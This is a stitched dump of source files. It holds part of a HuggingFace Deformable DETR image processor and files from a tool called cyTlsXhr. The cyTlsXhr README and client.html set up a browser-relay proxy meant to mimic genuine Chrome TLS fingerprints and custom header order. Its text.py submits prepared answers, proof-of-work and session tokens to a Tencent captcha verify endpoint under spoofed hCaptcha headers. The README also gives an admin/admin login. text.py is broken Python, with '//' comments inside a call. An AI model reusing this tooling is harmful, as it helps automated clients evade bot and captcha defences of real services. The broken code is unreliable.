input_channel_dimension (`ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be inferred from the input image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
pad_size = get_max_height_width(images)
padded_images = [
self._pad_image(image, pad_size, constant_values=constant_values, data_format=data_format)
for image in images
]
data = {"pixel_values": padded_images}
if return_pixel_mask:
masks = [make_pixel_mask(image=image, output_size=pad_size) for image in images]
data["pixel_mask"] = masks
return BatchFeature(data=data, tensor_type=return_tensors)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.preprocess
def preprocess(
self,
images: ImageInput,
annotations: Optional[Union[AnnotationType, List[AnnotationType]]] = None,
return_segmentation_masks: bool = None,
masks_path: Optional[Union[str, pathlib.Path]] = None,
do_resize: Optional[bool] = None,
size: Optional[Dict[str, int]] = None,
resample=None, # PILImageResampling
do_rescale: Optional[bool] = None,
rescale_factor: Optional[Union[int, float]] = None,
do_normalize: Optional[bool] = None,
image_mean: Optional[Union[float, List[float]]] = None,
image_std: Optional[Union[float, List[float]]] = None,
do_pad: Optional[bool] = None,
format: Optional[Union[str, AnnotionFormat]] = None,
return_tensors: Optional[Union[TensorType, str]] = None,
data_format: Union[str, ChannelDimension] = ChannelDimension.FIRST,
**kwargs,
) -> BatchFeature:
"""
Preprocess an image or a batch of images so that it can be used by the model.
Args:
images (`ImageInput`):
Image or batch of images to preprocess.
annotations (`AnnotationType` or `List[AnnotationType]`, *optional*):
List of annotations associated with the image or batch of images. If annotionation is for object
detection, the annotations should be a dictionary with the following keys:
- "image_id" (`int`): The image id.
- "annotations" (`List[Dict]`): List of annotations for an image. Each annotation should be a
dictionary. An image can have no annotations, in which case the list should be empty.
If annotionation is for segmentation, the annotations should be a dictionary with the following keys:
- "image_id" (`int`): The image id.
- "segments_info" (`List[Dict]`): List of segments for an image. Each segment should be a dictionary.
An image can have no segments, in which case the list should be empty.
- "file_name" (`str`): The file name of the image.
return_segmentation_masks (`bool`, *optional*, defaults to self.return_segmentation_masks):
Whether to return segmentation masks.
masks_path (`str` or `pathlib.Path`, *optional*):
Path to the directory containing the segmentation masks.
do_resize (`bool`, *optional*, defaults to self.do_resize):
Whether to resize the image.
size (`Dict[str, int]`, *optional*, defaults to self.size):
Size of the image after resizing.
resample (`PILImageResampling`, *optional*, defaults to self.resample):
Resampling filter to use when resizing the image.
do_rescale (`bool`, *optional*, defaults to self.do_rescale):
Whether to rescale the image.
rescale_factor (`float`, *optional*, defaults to self.rescale_factor):
Rescale factor to use when rescaling the image.
do_normalize (`bool`, *optional*, defaults to self.do_normalize):
Whether to normalize the image.
image_mean (`float` or `List[float]`, *optional*, defaults to self.image_mean):
Mean to use when normalizing the image.
image_std (`float` or `List[float]`, *optional*, defaults to self.image_std):
Standard deviation to use when normalizing the image.
do_pad (`bool`, *optional*, defaults to self.do_pad):
Whether to pad the image.
format (`str` or `AnnotionFormat`, *optional*, defaults to self.format):
Format of the annotations.
return_tensors (`str` or `TensorType`, *optional*, defaults to self.return_tensors):
Type of tensors to return. If `None`, will return the list of images.
data_format (`str` or `ChannelDimension`, *optional*, defaults to self.data_format):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
if "pad_and_return_pixel_mask" in kwargs:
warnings.warn(
"The `pad_and_return_pixel_mask` argument is deprecated and will be removed in a future version, "
"use `do_pad` instead.",
FutureWarning,
)
do_pad = kwargs.pop("pad_and_return_pixel_mask")
max_size = None
if "max_size" in kwargs:
warnings.warn(
"The `max_size` argument is deprecated and will be removed in a future version, use"
" `size['longest_edge']` instead.",
FutureWarning,
)
size = kwargs.pop("max_size")
do_resize = self.do_resize if do_resize is None else do_resize
size = self.size if size is None else size
size = get_size_dict(size=size, max_size=max_size, default_to_square=False)
resample = self.resample if resample is None else resample
do_rescale = self.do_rescale if do_rescale is None else do_rescale
rescale_factor = self.rescale_factor if rescale_factor is None else rescale_factor
do_normalize = self.do_normalize if do_normalize is None else do_normalize
image_mean = self.image_mean if image_mean is None else image_mean
image_std = self.image_std if image_std is None else image_std
do_pad = self.do_pad if do_pad is None else do_pad
format = self.format if format is None else format
if do_resize is not None and size is None:
raise ValueError("Size and max_size must be specified if do_resize is True.")
if do_rescale is not None and rescale_factor is None:
raise ValueError("Rescale factor must be specified if do_rescale is True.")
if do_normalize is not None and (image_mean is None or image_std is None):
raise ValueError("Image mean and std must be specified if do_normalize is True.")
images = make_list_of_images(images)
if annotations is not None and isinstance(annotations, dict):
annotations = [annotations]
if annotations is not None and len(images) != len(annotations):
raise ValueError(
f"The number of images ({len(images)}) and annotations ({len(annotations)}) do not match."
)
if not valid_images(images):
raise ValueError(
"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
"torch.Tensor, tf.Tensor or jax.ndarray."
)
format = AnnotionFormat(format)
if annotations is not None:
if format == AnnotionFormat.COCO_DETECTION and not valid_coco_detection_annotations(annotations):
raise ValueError(
"Invalid COCO detection annotations. Annotations must a dict (single image) of list of dicts"
"(batch of images) with the following keys: `image_id` and `annotations`, with the latter "
"being a list of annotations in the COCO format."
)
elif format == AnnotionFormat.COCO_PANOPTIC and not valid_coco_panoptic_annotations(annotations):
raise ValueError(
"Invalid COCO panoptic annotations. Annotations must a dict (single image) of list of dicts "
"(batch of images) with the following keys: `image_id`, `file_name` and `segments_info`, with "
"the latter being a list of annotations in the COCO format."
)
elif format not in SUPPORTED_ANNOTATION_FORMATS:
raise ValueError(
f"Unsupported annotation format: {format} must be one of {SUPPORTED_ANNOTATION_FORMATS}"
)
if (
masks_path is not None
and format == AnnotionFormat.COCO_PANOPTIC
and not isinstance(masks_path, (pathlib.Path, str))
):
raise ValueError(
"The path to the directory containing the mask PNG files should be provided as a"
f" `pathlib.Path` or string object, but is {type(masks_path)} instead."
)
# All transformations expect numpy arrays
images = [to_numpy_array(image) for image in images]
# prepare (COCO annotations as a list of Dict -> DETR target as a single Dict per image)
if annotations is not None:
prepared_images = []
prepared_annotations = []
for image, target in zip(images, annotations):
target = self.prepare_annotation(
image, target, format, return_segmentation_masks=return_segmentation_masks, masks_path=masks_path
)
prepared_images.append(image)
prepared_annotations.append(target)
images = prepared_images
annotations = prepared_annotations
del prepared_images, prepared_annotations
# transformations
if do_resize:
if annotations is not None:
resized_images, resized_annotations = [], []
for image, target in zip(images, annotations):
orig_size = get_image_size(image)
resized_image = self.resize(image, size=size, max_size=max_size, resample=resample)
resized_annotation = self.resize_annotation(target, orig_size, get_image_size(resized_image))
resized_images.append(resized_image)
resized_annotations.append(resized_annotation)
images = resized_images
annotations = resized_annotations
del resized_images, resized_annotations
else:
images = [self.resize(image, size=size, resample=resample) for image in images]
if do_rescale:
images = [self.rescale(image, rescale_factor) for image in images]
if do_normalize:
images = [self.normalize(image, image_mean, image_std) for image in images]
if annotations is not None:
annotations = [
self.normalize_annotation(annotation, get_image_size(image))
for annotation, image in zip(annotations, images)
]
if do_pad:
# Pads images and returns their mask: {'pixel_values': ..., 'pixel_mask': ...}
data = self.pad(images, return_pixel_mask=True, data_format=data_format)
else:
images = [to_channel_dimension_format(image, data_format) for image in images]
data = {"pixel_values": images}
encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
if annotations is not None:
encoded_inputs["labels"] = [
BatchFeature(annotation, tensor_type=return_tensors) for annotation in annotations
]
return encoded_inputs
# POSTPROCESSING METHODS - TODO: add support for other frameworks
def post_process(self, outputs, target_sizes):
"""
Converts the raw output of [`DeformableDetrForObjectDetection`] into final bounding boxes in (top_left_x,
top_left_y, bottom_right_x, bottom_right_y) format. Only supports PyTorch.
Args:
outputs ([`DeformableDetrObjectDetectionOutput`]):
Raw outputs of the model.
target_sizes (`torch.Tensor` of shape `(batch_size, 2)`):
Tensor containing the size (height, width) of each image of the batch. For evaluation, this must be the
original image size (before any data augmentation). For visualization, this should be the image size
after data augment, but before padding.
Returns:
`List[Dict]`: A list of dictionaries, each dictionary containing the scores, labels and boxes for an image
in the batch as predicted by the model.
"""
warnings.warn(
"`post_process` is deprecated and will be removed in v5 of Transformers, please use"
" `post_process_object_detection`.",
FutureWarning,
)
out_logits, out_bbox = outputs.logits, outputs.pred_boxes
if len(out_logits) != len(target_sizes):
raise ValueError("Make sure that you pass in as many target sizes as the batch dimension of the logits")
if target_sizes.shape[1] != 2:
raise ValueError("Each element of target_sizes must contain the size (h, w) of each image of the batch")
prob = out_logits.sigmoid()
topk_values, topk_indexes = torch.topk(prob.view(out_logits.shape[0], -1), 100, dim=1)
scores = topk_values
topk_boxes = torch_int_div(topk_indexes, out_logits.shape[2])
labels = topk_indexes % out_logits.shape[2]
boxes = center_to_corners_format(out_bbox)
boxes = torch.gather(boxes, 1, topk_boxes.unsqueeze(-1).repeat(1, 1, 4))
# and from relative [0, 1] to absolute [0, height] coordinates
img_h, img_w = target_sizes.unbind(1)
scale_fct = torch.stack([img_w, img_h, img_w, img_h], dim=1)
boxes = boxes * scale_fct[:, None, :]
results = [{"scores": s, "labels": l, "boxes": b} for s, l, b in zip(scores, labels, boxes)]
return results
def post_process_object_detection(
self, outputs, threshold: float = 0.5, target_sizes: Union[TensorType, List[Tuple]] = None
):
"""
Converts the raw output of [`DeformableDetrForObjectDetection`] into final bounding boxes in (top_left_x,
top_left_y, bottom_right_x, bottom_right_y) format. Only supports PyTorch.
Args:
outputs ([`DetrObjectDetectionOutput`]):
Raw outputs of the model.
threshold (`float`, *optional*):
Score threshold to keep object detection predictions.
target_sizes (`torch.Tensor` or `List[Tuple[int, int]]`, *optional*):
Tensor of shape `(batch_size, 2)` or list of tuples (`Tuple[int, int]`) containing the target size
(height, width) of each image in the batch. If left to None, predictions will not be resized.
Returns:
`List[Dict]`: A list of dictionaries, each dictionary containing the scores, labels and boxes for an image
in the batch as predicted by the model.
"""
out_logits, out_bbox = outputs.logits, outputs.pred_boxes
if target_sizes is not None:
if len(out_logits) != len(target_sizes):
raise ValueError(
"Make sure that you pass in as many target sizes as the batch dimension of the logits"
)
prob = out_logits.sigmoid()
topk_values, topk_indexes = torch.topk(prob.view(out_logits.shape[0], -1), 100, dim=1)
scores = topk_values
topk_boxes = torch_int_div(topk_indexes, out_logits.shape[2])
labels = topk_indexes % out_logits.shape[2]
boxes = center_to_corners_format(out_bbox)
boxes = torch.gather(boxes, 1, topk_boxes.unsqueeze(-1).repeat(1, 1, 4))
# and from relative [0, 1] to absolute [0, height] coordinates
if isinstance(target_sizes, List):
img_h = torch.Tensor([i[0] for i in target_sizes])
img_w = torch.Tensor([i[1] for i in target_sizes])
else:
img_h, img_w = target_sizes.unbind(1)
scale_fct = torch.stack([img_w, img_h, img_w, img_h], dim=1).to(boxes.device)
boxes = boxes * scale_fct[:, None, :]
results = []
for s, l, b in zip(scores, labels, boxes):
score = s[s > threshold]
label = l[s > threshold]
box = b[s > threshold]
results.append({"scores": score, "labels": label, "boxes": box})
return results
|
2833844911/cyTlsXhr | 7,541 | text.py | import base64
import json
import urllib.parse
import requests
def send_request_POST() -> requests.Response:
headers = [
["cache-control", "no-cache"],
["sec-ch-ua-platform", "\"Windows\""],
["user-agent", 'dasdasdasdsad'],
["accept", "application/json"],
["sec-ch-ua", "\"Google Chrome\";v=\"126\", \"Not-A.Brand\";v=\"8\", \"Chromium\";v=\"126\""],
["content-type", "text/plain"],
["sec-ch-ua-mobile", "?0"],
["origin", "https://newassets.hcaptcha.com"],
["sec-fetch-site", "same-site"],
["sec-fetch-mode", "cors"],
["sec-fetch-dest", "empty"],
["sec-fetch-storage-access", "active"],
["referer", "https://newassets.hcaptcha.com/"],
["accept-encoding", "gzip, deflate, br, zstd"],
["accept-language", "zh,zh-CN;q=0.9,en;q=0.8"],
["priority", "u=1, i"]
]
data ={
'collect': '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',
'tlg': '2432',
'eks': 'jgRV5cVKt55oob94kMr5XPqR/Rg5jOLNtOeEE2A6xdAacoMwwRnEwyJyXTDiQz91OUoFpM8ih0FsWS5Nd3ondsQgFxGPJFXtVa3BpcFRI/aesijZKsOWJ75/6sweySWqL5Yg/BUtDQ1ESueHCga2KpSyojT4J08tH/YN9pTrtavDH/TX2WoJK/bh/5mzKenn23dTDCnSbMcuvQjVCN6H9erDHd/sF+FPTbcjLg/tkY4=',
'sess': 's0vP93cOMLB99IuLJ0Iro1miP8F5IOcVwgAf-IRRrSnEW_-F3BrSfUzKxx5ECb5wp0_Mn_wPKbVivaubtZe8WzJeEU_OCJQufuBURHxZ-EZIfNvL7Izln6ns05qtsCiYxBCtmewxhw-gH-HqBvjeDQOiyKb8ktLUgroTPXTdrNaWAkYR8i--eYy0VMWKAj_CSETd096s2exnZzw8JS2YBZh8DMsW2rvcSwAVChai_Cm7A99rJqxTCzrfyM1971A3phyf83d8xSzhjrzC55PAWmClhukFc-XXNfILTswSgZLkBFH3TWgzfWc5Ec-Z47Ec3xW46PK7psUQ5--htlb9m69EmGPybSXSesmbwjE_mhyDXnepCSUN52O36czOtvlDRnTiB4wwR15ITSQ4Owf6xROeyNBVLoVL0F9-YwS58x0mmkIgeZ9ZSZ8ITtIaXO-WABy_TzjQJsBvYV-FGkImQBGcKmc2NZ2GQqt53eRP1e3-c0YG9KkMiNhpFP2diUjVUepKhIpsYXLI_MIPbJmPwY2tJT7fkFwt1-M11biQhpMDjLOYqulD6-uflxyKL_ydbXK38RoMvWYN546HhZ4lAPhrs3dmb6uKRwkT6JjskEFRvNEH1O5hImCaHj_NMBLcmi5UUJZbXBhsq5YK7MnM3fUfMycSTTRxzSY_P1LMqB-yRcGJUaDC57PyGvMdaKoiRkQEhGg3w2teeP5aiFG0XRNEuNHtLLim-6dCDkZ1HJAFMbT6fRlrmlQPcvSjIVRAmR5a-AKYZyaiGFiGLDDlfpcPax0gaaJJCk_9OFq24HEKnxkklyf4K9t3CmcPBU2Ve4',
'ans': '[{"elem_id":1,"type":"DynAnswerType_UC","data":"5,6"}]',
'pow_answer': 'cafdee0e1e3b5ac0#10298',
'pow_calc_time': '27',
}
data = json.dumps(data)
return requests.post('http://127.0.0.1:15090/proxy',
json={'url': 'https://t.captcha.qq.com/cap_union_new_verify',
"headers": headers,
'method': 'POST',
'bodyType': '', # 传2进制数据可以直接 'bodyType': 'b64' 下面的body是2进制的base64编码,
'client_id': 'be22165f-e3c3-4570-94f1-017ea57ae459',
"token": "d7bed4fd-9852-430f-9d2a-695d2641bf80",
"body": data,
'proxy': 'http://xxx.xxx.xxx.xxx:xxxx' //必须传代理
})
def send_request_GET() -> requests.Response:
headers = [
["cache-control", "no-cache"],
["sec-ch-ua-platform", "\"Windows\""],
["user-agent", 'ddddd'],
["accept", "application/json"],
["sec-ch-ua", "\"Google Chrome\";v=\"126\", \"Not-A.Brand\";v=\"8\", \"Chromium\";v=\"126\""],
["content-type", "text/plain"],
["sec-ch-ua-mobile", "?0"],
["origin", "https://newassets.hcaptcha.com"],
["sec-fetch-site", "same-site"],
["sec-fetch-mode", "cors"],
["sec-fetch-dest", "empty"],
["sec-fetch-storage-access", "active"],
["referer", "https://newassets.hcaptcha.com/"],
["accept-encoding", "gzip, deflate, br, zstd"],
["accept-language", "zh,zh-CN;q=0.9,en;q=0.8"],
["priority", "u=1, i"]
]
return requests.post('http://127.0.0.1:15090/proxy', json={'url': 'https://www.baidu.com',
"headers": headers,
'method': 'GET',
'bodyType': '',
'client_id': 'be22165f-e3c3-4570-94f1-017ea57ae459',
'proxy': 'http://xxx.xxx.xxx.xxx:xxxx',//必须传代理
"token": "d7bed4fd-9852-430f-9d2a-695d2641bf80",
})
def main():
try:
response = send_request_POST()
print(f"Status Code: {response.status_code}")
print(f"Response: {base64.b64decode( response.json()['data']).decode('utf-8')}")
print(f"Response: {response.headers}")
response = send_request_GET()
print(f"Status Code: {response.status_code}")
print(f"Response: {base64.b64decode( response.json()['data']).decode('utf-8')}")
print(f"Response: {response.headers}")
except Exception as e:
print(f"发生错误: {e}")
if __name__ == "__main__":
main()
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,244 | src/transformers/models/deformable_detr/feature_extraction_deformable_detr.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for Deformable DETR."""
import warnings
from ...utils import logging
from .image_processing_deformable_detr import DeformableDetrImageProcessor
logger = logging.get_logger(__name__)
class DeformableDetrFeatureExtractor(DeformableDetrImageProcessor):
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"The class DeformableDetrFeatureExtractor is deprecated and will be removed in version 5 of Transformers."
" Please use DeformableDetrImageProcessor instead.",
FutureWarning,
)
super().__init__(*args, **kwargs)
|
2833844911/cyTlsXhr | 655 | README.md | ## cytlsxhr
- 视频教程: https://www.bilibili.com/video/BV1pKVaz1EsX
### 介绍
- 测试网站是否检测tls,该项目tls已经 经过各种测试应该是完美的134版本tls
- 请求需要携带代理,需要注意代理是否可以在国内使用
### 功能
- 使用浏览器转发让tls完美
- header可以自定义顺序
- 返回和请求不会有任何限制
- 保持统一会话
- 可以切换代理支持账号密码
### 准备环境
- 1.双击Chrome-bin/mini_installer.exe
- 2.把新安装的chrome.exe的路径复制到chrome.txt
### 启动
- 1.双击 proxy.exe
- 2.双击 server-debug.exe
### 获取token和client
- 1.浏览器打开http://127.0.0.1:15090/getinfo 登入admin/admin
- 2.复制浏览器状态中浏览器列表 里面的ID 例子:be22165f-e3c3-4570-94f1-017ea57ae459
- 3.粘贴到 text.py 中的client_id key的value里面
- 4.复制浏览器创建令牌中的创建令牌 里面的token 例子:d7bed4fd-9852-430f-9d2a-695d2641bf80
- 5.粘贴到 text.py 中的token key的value里面
- 6.运行 text.py
|
2833844911/cyTlsXhr | 20,810 | client.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>浏览器代理客户端</title>
<style>
body {
font-family: Arial, sans-serif;
max-width: 400px;
margin: 0 auto;
padding: 20px;
text-align: center;
}
#logs {
border: 1px solid #ccc;
padding: 10px;
height: 80px;
overflow-y: auto;
margin-bottom: 20px;
background-color: #f9f9f9;
text-align: left;
font-size: 12px;
}
.success { color: green; }
.error { color: red; }
.info { color: blue; }
.status {
font-weight: bold;
font-size: 24px;
margin: 20px 0;
padding: 10px;
border-radius: 5px;
}
.connected {
color: white;
background-color: green;
}
.disconnected {
color: white;
background-color: red;
}
.connecting {
color: white;
background-color: orange;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<h1>浏览器代理</h1>
<div class="status disconnected" id="status">未连接</div>
<div id="logs" class="hidden"></div>
<script>
let socket = null;
let clientId = null;
let reconnectTimeout = null;
let reconnectAttempts = 0;
const maxReconnectAttempts = 100; // 最大重连次数
let proxyAddress = "未知";
let proxyId = "未知"; // 添加proxyId变量
const statusDiv = document.getElementById('status');
const logsDiv = document.getElementById('logs');
// 获取URL参数
function getUrlParam(name) {
const urlParams = new URLSearchParams(window.location.search);
return urlParams.get(name);
}
// 尝试从URL获取代理地址参数和代理ID
function detectProxyAddress() {
// 从URL参数中获取代理地址
const proxyParam = getUrlParam('proxy');
if (proxyParam) {
proxyAddress = proxyParam;
log(`检测到代理地址参数: ${proxyAddress}`);
}
// 获取代理ID参数
const proxyIdParam = getUrlParam('proxy_id');
if (proxyIdParam) {
proxyId = proxyIdParam;
log(`检测到代理ID参数: ${proxyId}`);
}
// 如果没有直接参数,尝试通过其他方式检测
if (!proxyParam) {
try {
// 使用简单的方法: 获取URL中的proxy参数
const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
const proxy = urlParams.get('proxy');
if (proxy) {
proxyAddress = proxy;
log(`检测到代理地址: ${proxyAddress}`);
}
} catch (error) {
log(`检测代理地址失败: ${error.message}`, 'error');
}
}
}
// 记录日志
function log(message, type = 'info') {
const logEntry = document.createElement('div');
logEntry.className = type;
logEntry.textContent = `[${new Date().toLocaleTimeString()}] ${message}`;
logsDiv.appendChild(logEntry);
logsDiv.scrollTop = logsDiv.scrollHeight;
console.log(`[${type}] ${message}`);
// 最多保留50条日志
while (logsDiv.children.length > 50) {
logsDiv.removeChild(logsDiv.firstChild);
}
}
// 获取浏览器版本信息
function getBrowserVersion() {
const userAgent = navigator.userAgent;
let version = "未知";
let browserName = "未知";
// 检测常见浏览器
if (userAgent.indexOf("Chrome") > -1) {
browserName = "Chrome";
const chromeVersion = userAgent.match(/Chrome\/(\d+\.\d+)/);
if (chromeVersion && chromeVersion[1]) {
version = chromeVersion[1];
}
} else if (userAgent.indexOf("Firefox") > -1) {
browserName = "Firefox";
const firefoxVersion = userAgent.match(/Firefox\/(\d+\.\d+)/);
if (firefoxVersion && firefoxVersion[1]) {
version = firefoxVersion[1];
}
} else if (userAgent.indexOf("Safari") > -1 && userAgent.indexOf("Chrome") === -1) {
browserName = "Safari";
const safariVersion = userAgent.match(/Version\/(\d+\.\d+)/);
if (safariVersion && safariVersion[1]) {
version = safariVersion[1];
}
} else if (userAgent.indexOf("Edge") > -1 || userAgent.indexOf("Edg") > -1) {
browserName = "Edge";
const edgeVersion = userAgent.match(/Edge\/(\d+\.\d+)/) || userAgent.match(/Edg\/(\d+\.\d+)/);
if (edgeVersion && edgeVersion[1]) {
version = edgeVersion[1];
}
}
return `${browserName} ${version}`;
}
// 更新连接状态
function updateStatus(status) {
switch(status) {
case 'connected':
statusDiv.textContent = '已连接';
statusDiv.className = 'status connected';
break;
case 'disconnected':
statusDiv.textContent = '未连接';
statusDiv.className = 'status disconnected';
break;
case 'connecting':
statusDiv.textContent = '正在连接...';
statusDiv.className = 'status connecting';
break;
}
}
// 发送HTTP请求并返回结果
async function sendRequest(url, method, headers = {}, body = null) {
try {
const xhr = new XMLHttpRequest();
log(`发送HTTP请求: ${method} ${url}`);
// 使用同步XHR (第三个参数设为false)
xhr.open(method, url, false);
// 设置超时
xhr.timeout=20000;
xhr.responseType = 'arraybuffer';
// 检查headers是否为数组格式
let headersObj = headers;
if (Array.isArray(headers)) {
log(`检测到数组格式的headers,按顺序设置`);
headersObj = {};
// 将数组转换为对象,用于后续的内容类型检查
for (const [key, value] of headers) {
headersObj[key] = value;
}
}
// 根据内容类型设置适当的responseType
const contentTypeHeader = headersObj['Content-Type'] || headersObj['content-type'] || '';
const acceptHeader = headersObj['Accept'] || headersObj['accept'] || '';
// 检查是否是二进制内容类型
const isBinaryContent =
acceptHeader.includes('image/') ||
acceptHeader.includes('application/octet-stream') ||
acceptHeader.includes('audio/') ||
acceptHeader.includes('video/') ||
contentTypeHeader.includes('image/') ||
contentTypeHeader.includes('application/octet-stream') ||
contentTypeHeader.includes('audio/') ||
contentTypeHeader.includes('video/');
/* 同步XHR不能设置responseType
if (isBinaryContent) {
xhr.responseType = 'arraybuffer';
log('设置响应类型为arraybuffer,用于处理二进制数据');
}
*/
// 设置Accept-Encoding头,禁用Brotli压缩
if (!headersObj['Accept-Encoding'] && !headersObj['accept-encoding']) {
if (Array.isArray(headers)) {
// 为数组格式添加Accept-Encoding
headers.push(["Accept-Encoding", "gzip, deflate"]);
} else {
headers['Accept-Encoding'] = 'gzip, deflate';
}
}
// 设置请求头
var idxInfo = 0
if (Array.isArray(headers)) {
// 按数组顺序设置头
for (const [key, value] of headers) {
try {
if (key == 'host' || key == 'Host'){
continue
}
xhr.setRequestHeader("Cbb_"+idxInfo+"_"+key, value);
idxInfo += 1
log(`按顺序设置请求头: ${key} = ${value}`);
} catch(e) {
// log(`设置请求头出错: ${e.message}`, 'error');
}
}
} else {
// 使用对象格式设置头(原始方式)
for (const [key, value] of Object.entries(headers)) {
try{
xhr.setRequestHeader("Cbb_"+idxInfo+"_"+key, value);
idxInfo += 1
}catch(e){
// log(`设置请求头出错: ${e.message}`, 'error');
}
}
}
// 发送请求
if (body) {
xhr.send(body);
} else {
xhr.send();
}
// 获取响应头
const responseHeaders = {};
const headerString = xhr.getAllResponseHeaders();
const headerLines = headerString.trim().split(/[\r\n]+/);
headerLines.forEach(line => {
const parts = line.split(': ');
const header = parts.shift();
const value = parts.join(': ');
responseHeaders[header] = value;
});
// 获取响应体
let responseData;
responseData = arrayBufferToBase64(xhr.response);
return {
ok: xhr.status >= 200 && xhr.status < 300,
status: xhr.status,
statusText: xhr.statusText,
headers: responseHeaders,
data: responseData
};
} catch (error) {
log(`请求出错: ${error.message}`, 'error');
return {
ok: false,
error: error.message
};
}
}
// ArrayBuffer 转 Base64,支持 UTF-8 编码
function arrayBufferToBase64(buffer) {
let binary = '';
const bytes = new Uint8Array(buffer);
const len = bytes.byteLength;
for (let i = 0; i < len; i++) {
binary += String.fromCharCode(bytes[i]);
}
return btoa(binary);
}
// 将原始字节数组转换为base64
function _rawBytesToBase64(bytes) {
let binary = '';
const len = bytes.byteLength;
for (let i = 0; i < len; i++) {
binary += String.fromCharCode(bytes[i]);
}
return window.btoa(binary);
}
